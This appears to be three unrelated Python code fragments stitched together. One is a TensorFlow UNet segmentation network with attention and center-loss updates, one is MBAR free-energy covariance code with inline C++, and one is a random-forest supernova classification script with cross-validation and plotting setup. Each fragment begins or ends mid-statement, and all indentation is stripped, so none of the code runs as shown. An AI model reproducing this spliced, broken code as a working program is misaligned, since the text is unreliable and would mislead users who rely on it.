beta = tf.get_variable('beta', [], tf.float32, initializer=tf.constant_initializer(0.0))
cropped_feature_map = o * beta + cropped_feature_map
print 'cropped_feature_map is ', cropped_feature_map
output_feature_map = tf.reshape(cropped_feature_map, [shape[0], shape[1]-k+1, shape[2]-k+1, shape[3]])
output_feature_map = tf.image.resize_images(output_feature_map, [shape[1], shape[2]])
print('output_feature_map is ', output_feature_map)
self.output_feature_map = output_feature_map
def transpose2D(input_tensor, upsample_rate, transpose_kernel_size, use_batchnorm, is_training):
print('decoder is tranpose2D')
input_shape = input_tensor.get_shape().as_list()
output = slim.conv2d_transpose(input_tensor, num_outputs=input_shape[-1], kernel_size=transpose_kernel_size,
stride=upsample_rate, biases_initializer=None)
if use_batchnorm:
output = slim.batch_norm(output, is_training=is_training)
output = tf.nn.relu(output)
return output
def upsampling2D(input_tensor, upsample_rate):
print('decoder is upsampling2D')
input_shape = input_tensor.get_shape().as_list()
return tf.image.resize_images(input_tensor, [input_shape[1] * upsample_rate, input_shape[2] * upsample_rate])
class TaskNetworkModuleV2(object):
'''
对比上一个版本,本版本有multi scale 的功能
'''
def __init__(self, input_tensors, output_dim, output_shape, arg_sc, name, decoder='upsampling', is_training=True, hidden_dim=128):
last_output = None
# regularizer = tf.contrib.layers.l2_regularizer(scale=0.01)
# 从深层到浅层
final_output = []
learnable_merged_flag = True
different_scale_outputs = []
with tf.variable_scope(name):
with slim.arg_scope(arg_sc):
for idx, input_tensor in enumerate(input_tensors):
if last_output is not None:
if learnable_merged_flag:
alpha = tf.get_variable('alpha_' + str(idx), shape=[], dtype=tf.float32,
initializer=tf.ones_initializer(),
regularizer=None)
tf.summary.scalar('alpha_' + str(idx), alpha)
if decoder == 'upsampling':
last_output = upsampling2D(last_output, 2)
elif decoder == 'transpose':
last_output = transpose2D(last_output, 2, (4, 4), True, is_training=is_training)
print('the last output is ', last_output)
print('the output is ', input_tensor)
if learnable_merged_flag:
output = tf.concat([input_tensor, alpha * last_output], axis=-1)
else:
output = tf.concat([input_tensor, last_output], axis=-1)
else:
output = input_tensor
output = slim.conv2d(output, hidden_dim, kernel_size=1, stride=1,
scope='level_' + str(idx) + '_1x1')
output = slim.conv2d(output, hidden_dim, kernel_size=3, stride=1,
scope='level_' + str(idx) + '_3x3')
last_output = output
different_scale_outputs.append(last_output)
final_output.append(tf.image.resize_images(output, output_shape))
final_output = slim.conv2d(tf.concat(final_output, -1), hidden_dim * len(input_tensors) / 2,
kernel_size=1, stride=1, scope='merged_1x1')
final_output = slim.conv2d(final_output, hidden_dim * len(input_tensors) / 2,
kernel_size=3, stride=1, scope='merged_3x3')
local_similarity_attention = LocalSimilarityAttention(final_output, k=3, name='final_out',
arg_sc=arg_sc)
final_output = local_similarity_attention.output_feature_map
self.final_feature_map = final_output
final_output = slim.conv2d(final_output, output_dim,
kernel_size=1, stride=1, scope='logits', activation_fn=None,
normalizer_fn=None)
self.output = final_output
class UNet(object):
def __init__(self, inputs, mask_input, is_training, base_model='vgg16', decoder='upsampling',
update_center_flag=False, batch_size=4, init_center_value=None, similarity_alpha=1.0,
update_center_strategy=1):
self.inputs = inputs
self.is_training = is_training
self.mask_input = mask_input
self.base_model = base_model
self.decoder = decoder
self.batch_size = batch_size
self.num_classes = 2
self.hidden_dim = 128
self.img_size = 256
self.stride = 1
self.recovery_channal = 1
self.similarity_alpha = similarity_alpha
self.update_center_flag = update_center_flag
self.init_center_value = init_center_value
self.update_center_strategy = update_center_strategy
self._build_network()
self._up_down_layers()
self._logits_to_scores()
# if self.update_center_flag:
# self._compute_qij()
# self._compute_pij()
def _build_network(self):
import config
if config.model_type == MODEL_TYPE_vgg16:
from nets import vgg
with slim.arg_scope([slim.conv2d],
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(config.weight_decay),
weights_initializer=tf.contrib.layers.xavier_initializer(),
biases_initializer=tf.zeros_initializer()):
with slim.arg_scope([slim.conv2d, slim.max_pool2d],
padding='SAME') as sc:
self.arg_scope = sc
self.net, self.end_points = vgg.basenet(
inputs=self.inputs, pooling='MAX')
elif config.model_type == MODEL_TYPE_vgg16_no_dilation:
from nets import vgg
with slim.arg_scope([slim.conv2d],
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(config.weight_decay),
weights_initializer=tf.contrib.layers.xavier_initializer(),
biases_initializer=tf.zeros_initializer()):
with slim.arg_scope([slim.conv2d, slim.max_pool2d],
padding='SAME') as sc:
self.arg_scope = sc
self.net, self.end_points = vgg.basenet(
inputs=self.inputs, dilation=False, pooling='MAX')
else:
raise ValueError('model_type not supported:%s' % (config.model_type))
def _up_down_layers(self):
import config
input_tensors = []
for idx in range(0, len(skip_connection_setting[self.base_model]))[::-1]: # [4, 3, 2, 1, 0]
print('basemode: ', self.base_model)
current_layer_name = skip_connection_setting[self.base_model][idx]
current_layer = self.end_points[current_layer_name]
input_tensors.append(current_layer)
# 针对每个pixel进行分类,区分前景背景
pixel_cls_module = TaskNetworkModuleV2(input_tensors, config.num_classes,
[self.img_size / self.stride, self.img_size / self.stride],
self.arg_scope, name='pixel_cls', is_training=self.is_training,
decoder=self.decoder, hidden_dim=self.hidden_dim)
# 试图恢复pixel的值,提取real feature map,用于计算相似度
pixel_recovery_module = TaskNetworkModuleV2(input_tensors, self.recovery_channal,
[self.img_size / self.stride, self.img_size / self.stride],
self.arg_scope, name='pixel_recovery', is_training=self.is_training,
decoder=self.decoder, hidden_dim=self.hidden_dim)
self.pixel_cls_logits = pixel_cls_module.output
self.pixel_recovery_logits = pixel_recovery_module.output
self.pixel_recovery_features = pixel_recovery_module.final_feature_map
self.pixel_recovery_features_num_channal = self.pixel_recovery_features.get_shape().as_list()[-1]
# build center
if self.update_center_flag and self.init_center_value is not None:
self.centers = tf.get_variable('centers', [self.num_classes, self.pixel_recovery_features_num_channal],
dtype=tf.float32,
initializer=lambda shape, dtype, partition_info: np.asarray(
self.init_center_value,
np.float32),
trainable=False)
else:
self.centers = tf.get_variable('centers', [self.num_classes, self.pixel_recovery_features_num_channal],
dtype=tf.float32, initializer=tf.truncated_normal_initializer(),
trainable=False)
tf.summary.scalar('sum_centers', tf.reduce_sum(self.centers))
# tf.summary.histogram('centers', self.centers)
if self.stride != 1:
self.pixel_cls_logits = tf.image.resize_images(self.pixel_cls_logits, [self.img_size, self.img_size])
self.pixel_recovery_logits = tf.image.resize_images(self.pixel_recovery_logits,
[self.img_size, self.img_size])
def _flat_pixel_values(self, values):
shape = values.shape.as_list()
values = tf.reshape(values, shape=[shape[0], -1, shape[-1]])
return values
def _logits_to_scores(self):
self.pixel_cls_scores = tf.nn.softmax(self.pixel_cls_logits)
# self.pixel_recovery_value = tf.nn.sigmoid(self.pixel_recovery_logits)
self.pixel_recovery_value = self.pixel_recovery_logits
tf.summary.image('pred_mask', tf.expand_dims(self.pixel_cls_scores[:, :, :, 1], axis=3) * 200.0, max_outputs=1)
tf.summary.image('image', self.inputs, max_outputs=1)
tf.summary.scalar('max_image', tf.reduce_max(self.inputs))
tf.summary.image('recovery_image', self.pixel_recovery_value, max_outputs=1)
tf.summary.scalar('max_recovery_image', tf.reduce_max(self.pixel_recovery_value))
tf.summary.scalar('min_recovery_image', tf.reduce_min(self.pixel_recovery_value))
if self.mask_input is not None:
tf.summary.image('mask', self.mask_input * 200, max_outputs=1)
self.pixel_cls_logits_flatten = \
self._flat_pixel_values(self.pixel_cls_logits)
self.pixel_recovery_logits_flatten = self._flat_pixel_values(self.pixel_recovery_logits)
self.pixel_cls_scores_flatten = \
self._flat_pixel_values(self.pixel_cls_scores)
self.pixel_recovery_value_flatten = self._flat_pixel_values(self.pixel_recovery_value)
def _get_weakly_label_loss(self):
'''
总体上来说还是l2 loss,是为了让类内更加聚集
:return:
'''
# pixel_recovery_features = tf.nn.sigmoid(self.pixel_recovery_features)
pixel_recovery_features = self.pixel_recovery_features
distance = tf.map_fn(
lambda center_feature: tf.reduce_sum((pixel_recovery_features - center_feature) ** 2, axis=-1),
self.centers, dtype=tf.float32)
assign_label = tf.argmin(distance, axis=0)
vis_tensor = assign_label + 1
vis_tensor = tf.cast(vis_tensor * tf.cast(tf.logical_or(self.pos_mask, self.selected_neg_mask), tf.int64) * 100,
tf.uint8)
tf.summary.image('assign_label', tf.expand_dims(vis_tensor, axis=3), max_outputs=1)
assign_label = tf.stop_gradient(assign_label)
assign_features = tf.gather(self.centers, assign_label)
l2loss = tf.reduce_sum((assign_features - pixel_recovery_features) ** 2, axis=-1)
l2loss_pos = l2loss * tf.cast(self.pos_mask, tf.float32)
l2loss_neg = l2loss * tf.cast(self.selected_neg_mask, tf.float32)
l2loss = l2loss_pos + l2loss_neg
l2loss = tf.reduce_sum(l2loss) / (
tf.reduce_sum(tf.cast(self.pos_mask, tf.float32)) + tf.reduce_sum(
tf.cast(self.selected_neg_mask, tf.float32)))
return l2loss
def update_centers_V2(self):
'''
计算pos area和neg area 的feature 均值,根据此更新center
相当于针对每个batch,我们都有一个center,避免不同sample之间,病灶有所差异
:return:
'''
# TODO: 扩展到每个simple都更新一个center,然后再去计算loss
pos_features = tf.gather_nd(self.pixel_recovery_features, tf.where(self.pos_mask))
neg_features = tf.gather_nd(self.pixel_recovery_features, tf.where(self.selected_neg_mask))
pos_features = tf.reduce_mean(pos_features, axis=0, keepdims=True)
neg_features = tf.reduce_mean(neg_features, axis=0, keepdims=True)
updated_feature = tf.concat([pos_features, neg_features], axis=0)
center_update_op = tf.assign(self.centers, updated_feature)
return center_update_op
def update_centers(self, alpha):
'''
采用center loss的更新策略
:param alpha:
:return:
'''
# pixel_recovery_features = tf.nn.sigmoid(self.pixel_recovery_features)
pixel_recovery_features = self.pixel_recovery_features
distance = tf.map_fn(
lambda center_feature: tf.reduce_sum((pixel_recovery_features - center_feature) ** 2, axis=-1),
self.centers, dtype=tf.float32)
assign_label = tf.argmin(distance, axis=0)
prior_cond = tf.logical_or(self.pos_mask, self.selected_neg_mask)
# select_cond0 = tf.logical_and(prior_cond, tf.equal(assign_label, 0))
# select_cond1 = tf.logical_and(prior_cond, tf.equal(assign_label, 1))
# zero_mean_feature = tf.gather_nd(pixel_recovery_features, tf.where(select_cond0))
# one_mean_feature = tf.gather_nd(pixel_recovery_features, tf.where(select_cond1))
# zero_mean_feature = tf.reduce_mean(zero_mean_feature, keepdims=True, axis=0)
# zero_mean_feature = tf.where(tf.equal(tf.shape(zero_mean_feature)[0], 0),
# tf.expand_dims(self.centers[0], axis=0), zero_mean_feature)
#
# one_mean_feature = tf.reduce_mean(one_mean_feature, keepdims=True, axis=0)
# one_mean_feature = tf.where(tf.equal(tf.shape(one_mean_feature)[0], 0), tf.expand_dims(self.centers[1], axis=0),
# one_mean_feature)
# print zero_mean_feature, one_mean_feature
# updated_feature = tf.concat([zero_mean_feature, one_mean_feature], axis=0)
# centers_update_op = tf.assign(self.centers, updated_feature)
assign_label = tf.gather_nd(assign_label, tf.where(prior_cond))
assign_features = tf.gather(self.centers, assign_label)
pred_features = tf.gather_nd(pixel_recovery_features, tf.where(prior_cond))
diff = assign_features - pred_features
unique_label, unique_idx, unique_count = tf.unique_with_counts(assign_label)
appear_times = tf.gather(unique_count, unique_idx)
diff = diff / tf.expand_dims(tf.cast(1 + appear_times, tf.float32), axis=1)
diff = alpha * diff
centers_update_op = tf.scatter_sub(self.centers, assign_label, diff)
return centers_update_op
def _compute_qij(self):
similarity_abs = tf.map_fn(
lambda center: tf.pow(
(1 + tf.reduce_sum(tf.square(self.pixel_recovery_features - center), axis=3) / self.similarity_alpha),
(self.similarity_alpha + 1.) / 2. * -1.0), self.centers)
print 'similarity_abs is ', similarity_abs
print 'centers is ', self.centers
similarity_abs = tf.transpose(similarity_abs, [1, 2, 3, 0])
similarity_rel = similarity_abs / tf.reduce_sum(similarity_abs, axis=3, keepdims=True) # 相对相似距离
self.qij = similarity_rel
def _compute_pij(self):
# fj = tf.transpose(tf.reduce_sum(self.qij, axis=[0, 1, 2], keepdims=True), [3, 0, 1, 2])
fj = tf.reduce_sum(self.qij, axis=[0, 1, 2])
print 'fj is ', fj
print 'self.qij transpose is ', tf.transpose(self.qij, [3, 0, 1, 2])
pij_abs = tf.map_fn(lambda (single_fj, single_qij): tf.div(tf.square(single_qij), single_fj),
(fj, tf.transpose(self.qij, [3, 0, 1, 2])), dtype=tf.float32)
pij_abs = tf.transpose(pij_abs, | |
N_k W_nk = 1. Actual row sum for sample %d was %f' % (firstbad, row_sums[firstbad]))
# Compute estimate of asymptotic covariance matrix using specified method.
if method == 'generalized-inverse':
# Use generalized inverse (Eq. 8 of [1]) -- most general
# Theta = W' (I - W N W')^+ W
# Construct matrices
Ndiag = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64) # Diagonal N_k matrix.
W = numpy.matrix(W, dtype=numpy.float64)
I = numpy.identity(N, dtype=numpy.float64)
# Compute covariance
Theta = W.T * self._pseudoinverse(I - W * Ndiag * W.T) * W
elif method == 'inverse':
# Use standard inverse method (Eq. D8 of [1]) -- only applicable if all K states are different
# Theta = [(W'W)^-1 - N + 1 1'/N]^-1
# Construct matrices
Ndiag = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64) # Diagonal N_k matrix.
W = numpy.matrix(W, dtype=numpy.float64)
I = numpy.identity(N, dtype=numpy.float64)
O = numpy.ones([K,K], dtype=numpy.float64) / float(N) # matrix of ones, times 1/N
# Make sure W is nonsingular.
if (abs(numpy.linalg.det(W.T * W)) < tolerance):
print "Warning: W'W appears to be singular, yet 'inverse' method of uncertainty estimation requires W contain no duplicate states."
# Compute covariance
Theta = ( (W.T * W).I - Ndiag + O).I
elif method == 'approximate':
# Use fast approximate expression from Kong et al. -- this underestimates the true covariance, but may be a good approximation in some cases and requires no matrix inversions
# Theta = P'P
# Construct matrices
W = numpy.matrix(W, dtype=numpy.float64)
# Compute covariance
Theta = W.T * W
elif method == 'svd':
# Use singular value decomposition based approach given in supplementary material to efficiently compute uncertainty
# See Appendix D.1, Eq. D4 in [1].
# Construct matrices
Ndiag = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64)
W = numpy.matrix(W, dtype=numpy.float64)
I = numpy.identity(K, dtype=numpy.float64)
# Compute SVD of W
[U, S, Vt] = numpy.linalg.svd(W)
Sigma = numpy.matrix(numpy.diag(S))
V = numpy.matrix(Vt).T
# Compute covariance
Theta = V * Sigma * self._pseudoinverse(I - Sigma * V.T * Ndiag * V * Sigma) * Sigma * V.T
elif method == 'svd-ew':
# Use singular value decomposition based approach given in supplementary material to efficiently compute uncertainty
# The eigenvalue decomposition of W'W is used to forego computing the SVD.
# See Appendix D.1, Eqs. D4 and D5 of [1].
# Construct matrices
Ndiag = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64)
W = numpy.matrix(W, dtype=numpy.float64)
I = numpy.identity(K, dtype=numpy.float64)
# Compute singular values and right singular vectors of W without using SVD
# Instead, we compute eigenvalues and eigenvectors of W'W.
# Note W'W = (U S V')'(U S V') = V S' U' U S V' = V (S'S) V'
[S2, V] = numpy.linalg.eigh(W.T * W)
# Set any slightly negative eigenvalues to zero.
S2[numpy.where(S2 < 0.0)] = 0.0
# Form matrix of singular values Sigma, and V.
Sigma = numpy.matrix(numpy.diag(numpy.sqrt(S2)))
V = numpy.matrix(V)
# Compute covariance
Theta = V * Sigma * self._pseudoinverse(I - Sigma * V.T * Ndiag * V * Sigma) * Sigma * V.T
elif method == 'tan-HGH':
# Use method suggested by Zhiqiang Tan without further simplification.
# TODO: There may be a problem here -- double-check this.
[N,K] = W.shape
# Estimate O matrix from W'W.
W = numpy.matrix(W, dtype=numpy.float64)
O = W.T * W
# Assemble the Lambda matrix.
Lambda = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64)
# Identity matrix.
I = numpy.matrix(numpy.eye(K), dtype=numpy.float64)
# Compute H and G matrices.
H = O*Lambda - I
G = O - O*Lambda*O
# Compute pseudoinverse of H
Hinv = self._pseudoinverse(H)
# Compute estimate of asymptotic covariance.
Theta = Hinv * G * Hinv.T
elif method == 'tan':
# Use method suggested by <NAME>.
# Estimate O matrix from W'W.
W = numpy.matrix(W, dtype=numpy.float64)
O = W.T * W
# Assemble the Lambda matrix.
Lambda = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64)
# Compute covariance.
Oinv = self._pseudoinverse(O)
Theta = self._pseudoinverse(Oinv - Lambda)
else:
# Raise an exception.
raise ParameterError('Method ' + method + ' unrecognized.')
return Theta
#=============================================================================================
def _initializeFreeEnergies(self, verbose=False, method='zeros'):
"""
Compute an initial guess at the relative free energies.
OPTIONAL ARGUMENTS
verbose (boolean) - If True, will print debug information (default: False)
method (string) - Method for initializing guess at free energies.
'zeros' - all free energies are initially set to zero
'mean-reduced-potential' - the mean reduced potential is used
"""
if (method == 'zeros'):
# Use zeros for initial free energies.
if verbose: print "Initializing free energies to zero."
self.f_k[:] = 0.0
elif (method == 'mean-reduced-potential'):
# Compute initial guess at free energies from the mean reduced potential from each state
if verbose: print "Initializing free energies with mean reduced potential for each state."
means = numpy.zeros([self.K],float)
for k in self.nonzero_N_k_indices:
means[k] = self.u_kln[k,k,0:self.N_k[k]].mean()
if (numpy.max(numpy.abs(means)) < 0.000001):
print "Warning: All mean reduced potentials are close to zero. If you are using energy differences in the u_kln matrix, then the mean reduced potentials will be zero, and this is expected behavoir."
self.f_k = means
elif (method == 'BAR'):
# TODO: Can we guess a good path for this initial guess for arbitrary "topologies"?
# For now, make a simple list of those states with samples.
initialization_order = numpy.where(self.N_k > 0)[0]
# Initialize all f_k to zero.
self.f_k[:] = 0.0
# Initialize the rest
for index in range(0, numpy.size(initialization_order)-1):
k = initialization_order[index]
l = initialization_order[index+1]
w_F = (self.u_kln[k, l, 0:self.N_k[k]] - self.u_kln[k, k, 0:self.N_k[k]]) # forward work
w_R = (self.u_kln[l, k, 0:self.N_k[l]] - self.u_kln[l, l, 0:self.N_k[l]]) # reverse work
if (len(w_F) > 0 and len(w_R) > 0):
# BAR solution doesn't need to be incredibly accurate to kickstart NR.
self.f_k[l] = self.f_k[k] + computeBAR(w_F, w_R, relative_tolerance=0.000001, verbose=False, compute_uncertainty=False)
else:
# no states observed, so we don't need to initialize this free energy anyway, as
# the solution is noniterative.
self.f_k[l] = 0
else:
# The specified method is not implemented.
raise ParameterError('Method ' + method + ' unrecognized.')
# Shift all free energies such that f_0 = 0.
self.f_k[:] = self.f_k[:] - self.f_k[0]
return
#=============================================================================================
def _computeUnnormalizedLogWeights(self, u_kn):
"""
Return unnormalized log weights.
REQUIRED ARGUMENTS
u_kn (K x N_max numpy float64 array) - reduced potential energies
OPTIONAL ARGUMENTS
RETURN VALUES
log_w_kn (K x N_max numpy float64 array) - unnormalized log weights
REFERENCE
'log weights' here refers to \log [ \sum_{k=1}^K N_k exp[f_k - (u_k(x_n) - u(x_n)] ]
"""
if (self.use_embedded_helper_code):
# Use embedded C++ optimizations.
import _pymbar
u_kn = numpy.array(u_kn, dtype=numpy.float64) # necessary for helper code to interpret type of u_kn
log_w_kn = _pymbar.computeUnnormalizedLogWeightsCpp(self.K, self.N_max, self.K_nonzero, self.nonzero_N_k_indices, self.N_k, self.f_k, self.u_kln, u_kn);
else:
try:
#z= 1/0
#pass
from scipy import weave
# Allocate storage for return values.
log_w_kn = numpy.zeros([self.K,self.N_max], dtype=numpy.float64)
# Copy useful class members to local variables.
K = self.K
f_k = self.f_k
N_k = self.N_k
u_kln = self.u_kln
# Weave inline C++ code.
code = """
double log_terms[%(K)d]; // temporary storage for log terms
for (int k = 0; k < K; k++) {
for (int n = 0; n < N_K1(k); n++) {
double max_log_term = 0.0;
bool first_nonzero = true;
for (int j = 0; j < K; j++) {
// skip empty states
if (N_K1(j) == 0) continue;
double log_term = log(N_K1(j)) + F_K1(j) - U_KLN3(k,j,n) + U_KN2(k,n);
log_terms[j] = log_term;
if (first_nonzero || (log_term > max_log_term)) {
max_log_term = log_term;
first_nonzero = false;
}
}
double term_sum = 0.0;
for (int j = 0; j < K; j++) {
// skip empty states
if (N_K1(j) == 0) continue;
term_sum += exp(log_terms[j] - max_log_term);
}
double log_term_sum = log(term_sum) + max_log_term;
LOG_W_KN2(k,n) = - log_term_sum;
}
}
""" % vars()
# Execute inline C code with weave.
info = weave.inline(code, ['K', 'N_k', 'u_kn', 'u_kln', 'f_k', 'log_w_kn'], headers=['<math.h>', '<stdlib.h>'], verbose=2)
except:
# Compute unnormalized log weights in pure | |
n_bins=Nbins_RFP)
print "Fraction of True Positives in",Nbins_RFP,"probabilty bins"
print ' '.join(['{:.3f}'.format(f) for f in fraction_true])
#TEMPLATE STATISTICS
print "\nTemplate Statistics for {} Data".format(sim)
templates, counts = np.unique(data_test['sim_nonIa'].quantity.value, return_counts=True)
template_dict = dict(zip(templates, counts))
#statistics for numbers of true and ML types for each template
template_stats={}
for tmplt in template_dict:
template_stats[tmplt]={}
for typ in MLtypes:
template_stats[tmplt][CLFid+typ]=np.sum(predict[Test][typ] & (data_test['sim_nonIa']==tmplt))
template_stats[tmplt]['True'+typ]=np.sum(true[Test][typ] & (data_test['sim_nonIa']==tmplt))
if(template_stats[tmplt]['True'+typ]>0):
template_stats[tmplt]['Type']=typ
#count template occurrences for SN classified as Ia
CLFIa_mask = (probs[sim] > P_eff[sim])
CLFIa_templates, CLFIa_counts = np.unique(data_test['sim_nonIa'][CLFIa_mask].quantity.value, return_counts=True)
Iatemplate_dict = dict(zip(CLFIa_templates, CLFIa_counts))
print "\nType\t|\tValue"
#need to print in frequency order
keys=Iatemplate_dict.keys()
template_freq = sorted(Iatemplate_dict.values())
template_freq.reverse()
ordered_keys=[]
for freq in template_freq:
#index=freqs.index(freq)
for key in keys:
if Iatemplate_dict[key]==freq:
if not(key in ordered_keys):
print key,'\t|\t' ,freq
ordered_keys.append(key)
npop=5
print npop,"most popular templates and frequencies for passing MLIa",ordered_keys[0:npop],template_freq[0:npop]
#sys.exit()
#CROSS_VALIDATION
# read in data
if(args.cv):
if(args.sample=='t'):
data_all = ttrain
# read in validation data only
elif(args.sample=='v'):
data_all = ttest
# combine both training and validation sets
elif(args.sample=='b'):
data_all = vstack([ttrain, ttest])
#data_all = read_sample()
snr_cut = data_all['snr1']>SNRcut # no cut at the moment
data = data_all[snr_cut]
X_data = get_features(args.ft, data)
# Get y_data (class labels)
if(args.nclass==2):
print '\n\t2-WAY CLASSIFICATION'
y_data = data['type'] # class 1=Ia match, 0=CC match
elif(args.nclass==3):
print '\n\t3-WAY CLASSIFICATION'
y_data = data['type3'] #3-way typing
#y_ROC = data['type'] # for ROC curve, need binary labels
cvclf = RandomForestClassifier(n_estimators=n_estimators, max_features=max_features, \
min_samples_split=min_samples_split, criterion=criterion, n_jobs=args.nc)
print '\n\nNow try cross-validation methods ...'
# Stratified k-fold cross-validation and compute scoring metric each time
print '\n----- Stratified K-fold cross-validation -----\n'
kvals = []
avgskf = []
stdkf = []
for k in range(2, 11):
kf = StratifiedKFold(y_data, n_folds=k, shuffle=True, random_state=42) # define cross validator
cv_scores_kf = cross_val_score(cvclf, X_data, y_data, scoring=score_func_est, cv=kf)
print 'k={} folds CV scores : '.format(k), cv_scores_kf
kvals.append(k)
avgskf.append(np.mean(cv_scores_kf))
stdkf.append(np.std(cv_scores_kf)/np.sqrt(float(len(cv_scores_kf))))
# ShuffleSplit with n iterations
print '\n\n----- ShuffleSplit iterations -----'
test_step = 0.1
tsvals = []
avgss = []
stdss = []
for ts in np.arange(0.1, 1, test_step):
print 'Fractional Test Size : ', ts
ss = ShuffleSplit(len(y_data), n_iter=args.niter, test_size=ts, random_state=42) # BUG: don't use train_size
for train_index, test_index in ss:
train1as = y_data[train_index]==0
test1as = y_data[test_index]==0
print "TRAIN SNIa:", np.sum(train1as), "\tTEST SNIa:", np.sum(test1as)
cv_scores_ss = cross_val_score(cvclf, X_data, y_data, scoring=score_func_est, cv=ss) #array of score values
print '\nCV scores (ShuffleSplit) = ', cv_scores_ss
#print 'Average Score = ', np.mean(cv_scores_ss)
#print 'Score Standard Deviation = ', np.std(cv_scores_ss)
tsvals.append(ts)
avgss.append(np.mean(cv_scores_ss))
stdss.append(np.std(cv_scores_ss)/np.sqrt(float(len(cv_scores_ss))))
#endif--args.cv
if(args.pc):
pfilename='DES_validation_fitprob_purity='
print "\nUsing purities",args.purities,"for test files"
pscores=[]
for purity in args.purities:
ptestfile=pfilename+str(purity)+'.txt'
ptest=read(ptestfile)
#print "Size of purity =",purity,"test data:",len(ptest)
cutptest=(ptest['snr1']>SNRcut)
ptest = ptest[cutptest]
print "Size of purity =",purity,"test data (after SNR cut):",len(ptest)
X_ptest=get_features(args.ft, ptest)
if(args.nclass==2):
y_ptest = ptest['type']
elif(args.nclass==3):
y_ptest = ptest['type3']
elif(args.nclass==4):
y_ptest = ptest['type2x2']
pprobs=clf.predict_proba(X_ptest)[:, 0] # SNeIa are class 0
#print len(X_ptest),len(pprobs),len(y_ptest)
pscore=score_func(pprobs, y_ptest)
print "Score for purity",purity,"=",pscore
pscores.append(pscore)
#endfor
#endif--args.pc
if(len(args.plotdir)==0):
print "Skipping plots and exiting"
sys.exit()
else:
print '\n********** STARTING PLOTS **********\n'
#setup pdf file name and other filenames for saving efficiencies etc
file_id='_{}'.format(args.filestr)
fnpurity=''
SNR=''
if ('purity' in args.test):
fnpurity='purity'+re.split('purity',os.path.splitext(args.test)[0])[1]
if ('SNR' in args.test):
SNR='SNR'+re.split('SNR',os.path.splitext(args.test)[0])[1]
if(len(datalist)>0):
dname='_'+'+'.join(datalist)+'Data'
else:
dname=''
pdfname = os.path.join(args.plotdir,'_'.join(['eff_pur_DES',str(args.nclass),'way_typing',str(nfeatures)+'features',SNR,fnpurity])+withpdf+dname+file_id+'.pdf')
multiPdf = PdfPages(pdfname)
#Setup "sim" data to plot
alldata={}
mask={}
#setup cuts according to type and save in alldata dict
for sim in simlist:
if (sim==Training):
simdata=data_train
simlabel=Training
else:
simdata=data_test
simlabel=Test
simdata['true_mu']=simdata['sim_mu']
#augment simdata with other variables
simdata[HR]=simdata['mu']-simdata['sim_mu'] #Hubble Residual
#add to dict
smaskIa=simdata['sim_nonIa']==0
smaskCC=simdata['sim_nonIa']>0
smaskIbc=simdata['type3']==1
smaskII=simdata['type3']==2
mask[sim]={Ia:smaskIa,CC:smaskCC,Ibc:smaskIbc,II:smaskII}
alldata[sim]={Ia:simdata[mask[sim][Ia]],CC:simdata[mask[sim][CC]],Ibc:simdata[mask[sim][Ibc]],II:simdata[mask[sim][II]],Total:simdata}
#plotlabels[Sim][simlabel]=plotlabels[Sim][simlabel] + ' Data'
#add CLFtype, TP and FP to dict for samples != Training
if not(sim==Training):
for t in MLtypes:
alldata[sim][CLFid+t]=simdata[predict[sim][t]]
alldata[sim][CLFid+TP+t]=simdata[CLFstats[sim][TP][t]]
alldata[sim][CLFid+FP+t]=simdata[CLFstats[sim][FP][t]]
#add CLFTotal for consistency and weights; will not need totals for TP and FP types
alldata[sim][CLFid+Total]=simdata
for key in sorted(alldata.keys()):
print "\nPlotting",key,"(simulated) data:"
for t in alldata[key].keys():
print "Number of type {} = {}".format(t,len(alldata[key][t]))
#Setup "observed" data to plot
obsdata={}
P_eff_ref = P_eff[Test]
for data in MLdatalist: #loop over data to plot; always include Test for plots requiring CLF classified data (eg HR plots)
if(data==Test): #setup entries to fill dicts
#obslabel='Test'
obsdata=data_test
obsdata['true_mu']=obsdata['sim_mu']
obsIa=obsdata['sim_nonIa']==0
obsCC=obsdata['sim_nonIa']>0
obsIbc=obsdata['type3']==1
obsII=obsdata['type3']==2
elif(data==Spec):
#obslabel='Spec.'
obsdata=data_spec
obsIa=obsdata['spec_eval']=='SNIa'
obsCC=obsdata['spec_eval']!='SNIa'
obsII=obsdata['spec_eval']=='SNII'
obsIbc=(obsdata['spec_eval']!='SNIa') & (obsdata['spec_eval']!='SNII')
elif(data==Spec_nofp):
#obsdata=data_spec_nofp
obslabel='Spec. No $f_p$ Cut '
obsIa=obsdata['spec_eval']=='SNIa'
obsCC=obsdata['spec_eval']!='SNIa'
obsII=obsdata['spec_eval']=='SNII'
obsIbc=(obsdata['spec_eval']!='SNIa') & (obsdata['spec_eval']!='SNII')
elif(data==Phot):
#obslabel='Phot.'
obsdata=data_phot
#special case of phot test data
if('sim_mu' in obsdata.keys()):
obsdata['true_mu']=obsdata['sim_mu']
#unknown true types; all False masks
obsIa=np.zeros(len(obsdata['snid']),dtype=bool)
obsCC=np.zeros(len(obsdata['snid']),dtype=bool)
obsIbc=np.zeros(len(obsdata['snid']),dtype=bool)
obsII=np.zeros(len(obsdata['snid']),dtype=bool)
#save mask
mask[data]={Ia:obsIa,CC:obsCC,Ibc:obsIbc,II:obsII}
omask={Ia:obsIa,CC:obsCC,Ibc:obsIbc,II:obsII}
#save label
#plotlabels[Data][data]=plotlabels[Data][data]+' Data'
#ML-type labeled observed data
if(not(data in predict.keys())): #data_test already typed and predictions printed
predict[data]={}
X_data = get_features(args.ft, obsdata)
dataprobs=clf.predict_proba(X_data)
predict[data][Ia] = dataprobs[:, 0]>P_eff_ref
predict[data][CC] = ~predict[data][Ia]
#compute true mu
cosmo = FlatLambdaCDM(H0=H0, Om0=OmegaM)
obsdata['true_mu']=cosmo.distmod(obsdata['z'])
if (args.nclass==3):
predict[data][II]=(dataprobs[:,0]<P_eff_ref) & (dataprobs[:,2]>dataprobs[:,1])
predict[data][Ibc]=(~predict[data][Ia]) & (~predict[data][II])
#print summary
print
for t in MLtypes:
print 'Predicted number of {} Data {} with P_thresh {:0.3f} = {}'.format(data,
t, float(P_eff_ref), np.sum(predict[data][t]))
#fill and print some more stats
CLFstats[data]={}
if((np.sum(omask[Ia]) + np.sum(omask[CC])) > 0):
